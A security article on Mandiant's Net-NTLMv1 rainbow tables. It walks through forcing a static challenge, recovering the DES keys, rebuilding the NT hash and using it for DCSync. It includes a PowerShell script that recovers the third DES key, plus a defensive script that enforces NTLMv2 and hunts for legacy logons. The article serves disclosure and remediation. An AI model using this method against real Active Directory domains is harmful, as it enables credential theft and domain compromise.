
Mandiant has released a large set of rainbow tables dedicated to Net-NTLMv1 with the aim of concretely demonstrating how insecure this authentication protocol has become. Although Net-NTLMv1 has been deprecated for years and its weaknesses are widely documented, the company’s consultants continue to detect its use in operational enterprise environments.
According to Mandiant, the persistence of this legacy protocol is often due to organizational inertia and the difficulty of demonstrating immediate and tangible risk. The publication of the dataset aims to reduce this barrier, providing the community with practical tools to demonstrate the actual ease with which Net-NTLMv1 can be exploited.
The weaknesses of Net-NTLMv1 have been known since at least the late 1990s, when the first cryptographic analyses of the protocol were published. In 2012, during DEFCON 20, the security community publicly reiterated the inadequacy of this authentication mechanism compared to modern standards.
A significant step forward occurred on August 30, 2016, when Hashcat introduced support for reconstructing the NT hash from recovered DES keys. This feature made it quicker to complete the attack chain, allowing the obtained keys to be transformed into directly reusable credentials.
The concept of rainbow tables is not new either: the first formal treatment dates back to 2003, when Philippe Oechslin refined the cryptanalytic time-memory trade-off that Martin Hellman had introduced as early as 1980.
Net-NTLMv1 builds its 24-byte response from three DES keys derived directly from the password hash: the 16-byte NT hash is padded with five zero bytes to 21 bytes and cut into three 7-byte DES keys, each of which encrypts the same 8-byte server challenge. Without Extended Session Security (ESS), that challenge is the DES plaintext itself. If an attacker controls the challenge, for example by answering with the static value 1122334455667788 from a rogue server, every intercepted response is a known-plaintext/ciphertext pair for each of the three keys, and a precomputed table can be used to look the keys up.
Recovering those keys recovers the cryptographic material used during authentication, and that material is the NT hash of the affected Active Directory object. The result can therefore be used immediately, without any password cracking, to act as the user or computer account, which frequently leads to privilege escalation.
A particularly critical case is when the coerced client is a domain controller. Recovering the NT hash of the DC's machine account would allow DCSync operations and lead to the compromise of the entire Active Directory domain.
The rainbow table set published by Mandiant is available through Google Cloud Storage and can be stored entirely on a single 2 TB SSD, costing approximately $130. The provided SHA512 checksums allow you to verify its integrity before use.
The dataset release is accompanied by rcrelay.py, a tool integrated into an updated fork of RainbowCrack. It automates the table lookup as soon as a Net-NTLMv1 response is intercepted, eliminating much of the manual work previously required.
According to Mandiant, this integration dramatically reduces attack complexity and highlights how indefensible Net-NTLMv1 has become in modern environments.

To obtain Net-NTLMv1 responses, an attacker coerces Windows systems into authenticating to an attacker-controlled host that negotiates Net-NTLMv1; a client whose policy still permits the protocol will comply. In the blog post, Mandiant cites PetitPotam as an example of an authentication coercion technique used to generate such incoming connections, including those from domain controllers.
Splitting the response into its three DES components is not a step the attacker chooses; the protocol itself computes the response as three independent DES operations over the same challenge, which is why each 7-byte key can be attacked on its own. Tools like rcrelay.py handle this logic automatically during the lookup phase.

The published rainbow tables cover the first two DES keys, each carrying 7 bytes of the NT hash. The third key contains only the last 2 bytes of the hash followed by five zero bytes, so it has just 65,536 possible values; it can be brute-forced in a fraction of a second and is therefore excluded from the dataset.
Once all three keys are recovered, concatenating them yields the NT hash of the compromised account, a step Hashcat supports directly. The hash is then immediately usable for subsequent attacks, such as DCSync with tools from the Impacket suite.
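As an added example, not code from the Mandiant post or from rcrelay.py, the following PowerShell script reproduces the response construction described above, then recovers the third DES key by brute force and shows that the three keys together are the NT hash. It assumes the no-ESS case with the static challenge 1122334455667788 and uses the publicly known NT hash of the password "password" as its sample input; `Get-EssChallenge` is included only to show why ESS defeats a static-challenge table. DES comes from .NET, which refuses the weak key that a hash ending in two zero bytes would produce, so that one candidate is skipped.

```powershell
# Added example (not Mandiant's code): Net-NTLMv1 response construction and K3 brute force.
# Assumptions: no ESS, attacker-chosen static challenge, sample NT hash of "password".

function ConvertFrom-Hex([string]$Hex) {
    [byte[]](0..($Hex.Length / 2 - 1) | ForEach-Object { [Convert]::ToByte($Hex.Substring(2 * $_, 2), 16) })
}
function ConvertTo-Hex([byte[]]$Bytes) { ($Bytes | ForEach-Object { $_.ToString('X2') }) -join '' }

# Spread 56 key bits from 7 bytes over 8 bytes (low bit of each byte is the parity bit).
function Expand-DesKey([byte[]]$K7) {
    $k = New-Object byte[] 8
    $k[0] = $K7[0] -band 0xFE
    $k[1] = (($K7[0] -shl 7) -bor ($K7[1] -shr 1)) -band 0xFE
    $k[2] = (($K7[1] -shl 6) -bor ($K7[2] -shr 2)) -band 0xFE
    $k[3] = (($K7[2] -shl 5) -bor ($K7[3] -shr 3)) -band 0xFE
    $k[4] = (($K7[3] -shl 4) -bor ($K7[4] -shr 4)) -band 0xFE
    $k[5] = (($K7[4] -shl 3) -bor ($K7[5] -shr 5)) -band 0xFE
    $k[6] = (($K7[5] -shl 2) -bor ($K7[6] -shr 6)) -band 0xFE
    $k[7] = ($K7[6] -shl 1) -band 0xFE
    for ($i = 0; $i -lt 8; $i++) {                      # set odd parity, as the NTLM code does
        $ones = 0; $b = [int]$k[$i]
        while ($b) { $ones += ($b -band 1); $b = $b -shr 1 }
        if (($ones % 2) -eq 0) { $k[$i] = $k[$i] -bor 1 }
    }
    return $k
}

# Single-block DES-ECB encryption with a 7-byte key; .NET throws for DES weak keys.
function Invoke-DesEcb([byte[]]$K7, [byte[]]$Block) {
    $des = [System.Security.Cryptography.DES]::Create()
    try {
        $des.Mode    = [System.Security.Cryptography.CipherMode]::ECB
        $des.Padding = [System.Security.Cryptography.PaddingMode]::None
        $des.Key     = Expand-DesKey $K7
        $des.CreateEncryptor().TransformFinalBlock($Block, 0, 8)
    } finally { $des.Dispose() }
}

# NT hash (16 bytes) + 5 zero bytes = 21 bytes = three 7-byte DES keys; each encrypts the challenge.
function Get-NetNtlmV1Response([byte[]]$NtHash, [byte[]]$Challenge) {
    $padded = New-Object byte[] 21
    [Array]::Copy($NtHash, $padded, 16)
    $resp = foreach ($off in 0, 7, 14) { Invoke-DesEcb ([byte[]]$padded[$off..($off + 6)]) $Challenge }
    return [byte[]]$resp
}

# K3 has only 2 bytes of hash material, so 65,536 candidates cover the whole key space.
function Find-ThirdKey([byte[]]$Response, [byte[]]$Challenge) {
    $target = ConvertTo-Hex ([byte[]]$Response[16..23])
    for ($n = 0; $n -lt 0x10000; $n++) {
        $k3 = [byte[]](($n -shr 8), ($n -band 0xFF), 0, 0, 0, 0, 0)
        try { $ct = Invoke-DesEcb $k3 $Challenge } catch { continue }   # skip the .NET weak-key case
        if ((ConvertTo-Hex $ct) -eq $target) { return [byte[]]$k3[0..1] }
    }
}

# With ESS the DES plaintext is MD5(serverChallenge || clientNonce)[0..7], which changes
# on every authentication, so a table precomputed for a static challenge no longer applies.
function Get-EssChallenge([byte[]]$ServerChallenge, [byte[]]$ClientNonce) {
    $md5 = [System.Security.Cryptography.MD5]::Create()
    try { [byte[]]($md5.ComputeHash([byte[]]($ServerChallenge + $ClientNonce)))[0..7] } finally { $md5.Dispose() }
}

$ntHash    = ConvertFrom-Hex '8846F7EAEE8FB117AD06BDD830B7586C'   # public test vector: NT hash of "password"
$challenge = ConvertFrom-Hex '1122334455667788'                   # static challenge used by rogue servers
$response  = Get-NetNtlmV1Response $ntHash $challenge
'Net-NTLMv1 response : {0}' -f (ConvertTo-Hex $response)
'K1 / K2 (table work): {0} / {1}' -f (ConvertTo-Hex ([byte[]]$ntHash[0..6])), (ConvertTo-Hex ([byte[]]$ntHash[7..13]))

$k3 = Find-ThirdKey $response $challenge
'K3 by brute force   : {0} (hash bytes 14-15: {1})' -f (ConvertTo-Hex $k3), (ConvertTo-Hex ([byte[]]$ntHash[14..15]))
'Reconstructed NT hash: {0}' -f ((ConvertTo-Hex ([byte[]]$ntHash[0..13])) + (ConvertTo-Hex $k3))

$ess = Get-EssChallenge $challenge (ConvertFrom-Hex '0102030405060708')   # constructed client nonce
'ESS effective challenge: {0} (differs from the static value)' -f (ConvertTo-Hex $ess)
```

The brute force takes a few seconds in PowerShell because a new DES transform is created per candidate; the "fraction of a second" figure in the text refers to native tooling. K1 and K2 are printed from the known hash only to show where the rainbow tables do their work; in a real attack those two keys come from the table lookup and the reconstructed hash is K1 || K2 || the two recovered bytes of K3.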
Mandiant recommends immediately disabling Net-NTLMv1 in all environments. The relevant setting is "Network security: LAN Manager authentication level", which should be set to "Send NTLMv2 response only. Refuse LM & NTLM" (LmCompatibilityLevel 5); it can be applied through the local security policy of each computer or centrally through Group Policy.
Because the policy is ultimately a registry value on each host, an attacker with local administrative privileges could restore a vulnerable state, at least until the next Group Policy refresh. Therefore, in addition to disabling the protocol, it is essential to monitor which NTLM version is actually being used.
This can be checked in the Security log of the host that accepted the logon, in events with ID 4624. For NTLM logons the "Authentication Package" field only says "NTLM"; the version appears in the "Package Name (NTLM only)" field. A value of "LM" or "NTLM V1" there indicates that an outdated mechanism was used and requires immediate action.
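The following PowerShell script is an added example (not from the Mandiant post) of the two remediation steps above on a single host: it reads and sets LmCompatibilityLevel, and it scans recent 4624 events for logons whose "Package Name (NTLM only)" field (XML field name LmPackageName) is "LM" or "NTLM V1". The function and variable names are the author's choices; reading the Security log requires an elevated session.

```powershell
# Added example (not Mandiant's code): enforce NTLMv2-only and hunt for LM / NTLM V1 logons.
# LmCompatibilityLevel 5 = "Send NTLMv2 response only. Refuse LM & NTLM", the value behind the
# policy "Network security: LAN Manager authentication level".
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-LmCompatibilityLevel {
    $v = (Get-ItemProperty -Path $lsaKey -Name LmCompatibilityLevel -ErrorAction SilentlyContinue).LmCompatibilityLevel
    if ($null -eq $v) { return 'not set (OS default applies)' }   # default depends on the Windows version
    return [int]$v
}

function Set-NtlmV2Only {
    # Local enforcement only; on a domain-joined host the GPO value wins at the next policy refresh,
    # which is also why a local admin can only flip this back temporarily.
    Set-ItemProperty -Path $lsaKey -Name LmCompatibilityLevel -Value 5 -Type DWord
}

function Find-LegacyNtlmLogons([int]$MaxEvents = 5000) {
    # 4624 is written by the host that accepted the logon. For NTLM, AuthenticationPackageName is
    # just "NTLM"; the version is in LmPackageName ("Package Name (NTLM only)" in the GUI):
    # "LM", "NTLM V1" or "NTLM V2" ("-" for non-NTLM logons).
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            if ($d['LmPackageName'] -in @('LM', 'NTLM V1')) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    Package     = $d['LmPackageName']
                    Account     = '{0}\{1}' -f $d['TargetDomainName'], $d['TargetUserName']
                    SourceIP    = $d['IpAddress']
                    Workstation = $d['WorkstationName']
                    LogonType   = $d['LogonType']
                }
            }
        }
}

'LmCompatibilityLevel on {0}: {1}' -f $env:COMPUTERNAME, (Get-LmCompatibilityLevel)
# Set-NtlmV2Only            # uncomment to enforce locally; prefer the same setting in a GPO
Find-LegacyNtlmLogons | Format-Table -AutoSize
```

Run the detection part on domain controllers and file servers, or against centrally collected logs, since each 4624 is recorded only on the host that accepted the authentication. A single "NTLM V1" hit identifies both the account and, through the source IP and workstation name, the client that still negotiates the legacy protocol.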
